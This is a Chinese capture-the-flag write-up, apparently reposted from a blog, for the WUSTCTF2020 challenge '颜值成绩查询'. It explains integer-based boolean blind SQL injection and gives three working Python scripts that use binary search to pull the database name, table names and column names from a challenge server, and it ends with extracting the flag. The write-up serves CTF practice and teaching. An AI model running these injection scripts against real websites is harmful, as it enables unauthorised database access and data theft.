[WUSTCTF2020]颜值成绩查询
作者:互联网
[WUSTCTF2020]颜值成绩查询
整数型注入,盲注。
速度快,一定要二分法。
爆库名:ctf
二分法核心payload
"if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)
import requests
url = "http://8a12a75e-26f1-4a40-ad74-95086cfef9df.node3.buuoj.cn/?stunum="
result = ""
i = 0
while( True ):
i = i + 1
head=32
tail=127
while( head < tail ):
mid = (head + tail) >> 1
payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
r = requests.get(url+payload)
r.encoding = "utf-8"
#print(url+payload)
if "your score is: 100" in r.text :
head = mid + 1
else:
#print(r.text)
tail = mid
last = result
if head!=32:
result += chr(head)
else:
break
print(result)
回显结果参考下图:
爆表
flag,score
import requests
url = "http://8a12a75e-26f1-4a40-ad74-95086cfef9df.node3.buuoj.cn/?stunum="
result = ""
i = 0
while( True ):
i = i + 1
head=32
tail=127
while( head < tail ):
mid = (head + tail) >> 1
#payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)
r = requests.get(url+payload)
r.encoding = "utf-8"
#print(url+payload)
if "your score is: 100" in r.text :
head = mid + 1
else:
#print(r.text)
tail = mid
last = result
if head!=32:
result += chr(head)
else:
break
print(result)
回显结果参考下图:
爆列名
爆出flag和value两个字段
import requests
url = "http://8a12a75e-26f1-4a40-ad74-95086cfef9df.node3.buuoj.cn/?stunum="
result = ""
i = 0
while( True ):
i = i + 1
head=32
tail=127
while( head < tail ):
mid = (head + tail) >> 1
#payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
#payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)
payload = "if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')),%d,1))>%d,1,0)" % (i , mid)
r = requests.get(url+payload)
r.encoding = "utf-8"
#print(url+payload)
if "your score is: 100" in r.text :
head = mid + 1
else:
#print(r.text)
tail = mid
last = result
if head!=32:
result += chr(head)
else:
break
print(result)
爆信息
flag表中有flag和value两个字段
爆flag字段
爆的时候结果如下,没有给flag猜测是在value字段。
爆value字段,发现就是在value字段了。如果没有的画要爆一下别的。
还有啊二分法,一定要二分法。不然,遇到某些题可能你爆完比赛也结束了。
标签:head,WUSTCTF2020,颜值,mid,查询,tail,result,print,payload 来源: https://www.cnblogs.com/h3zh1/p/12702001.html